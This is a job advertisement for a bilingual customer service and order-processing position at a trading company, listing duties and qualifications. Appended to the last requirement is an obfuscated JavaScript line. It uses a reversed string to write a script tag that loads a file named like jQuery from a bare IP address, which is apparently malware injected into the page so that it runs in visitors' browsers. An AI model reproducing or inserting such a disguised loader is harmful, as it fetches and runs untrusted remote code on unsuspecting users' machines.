Industry : Trading
• Handling of customer enquiries on product, order and delivery status;
• Ensure customer’s orders that received through incoming telephone calls, email and faxes are processed on time;
• Handling of customer complaints and follow-up with the disposition actions;
• Provide more-proactive efforts to improve customer satisfaction.
• Process bulk Orders, raise Purchase Order and follow up on the order status with suppliers.
• Work closely with Sales or Finance Department on invoicing matters;
• Work closely with warehouse/logistic team to ensure daily order fulfilment are met;
• Provide support to local sales team in handling of customer related matters whenever are needed;
• Establish good rapport with customers
• Minimum SPM, Diploma, Advanced/Higher/Graduate Diploma in any field;
• Minimum 1 year of relevant working experiences;
• Bilingual in English and Mandarin in order to liaise with Mandarin speaking associates
• Able to work under fast pace, short lead time order processing environment;
• Pleasant and friendly personality, good telephone etiquette, soft spoken and customer focus
• Proficient in basic computer skills. Microsoft Dynamic Navision knowledge will be good advantage.
• Entry level are welcome document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))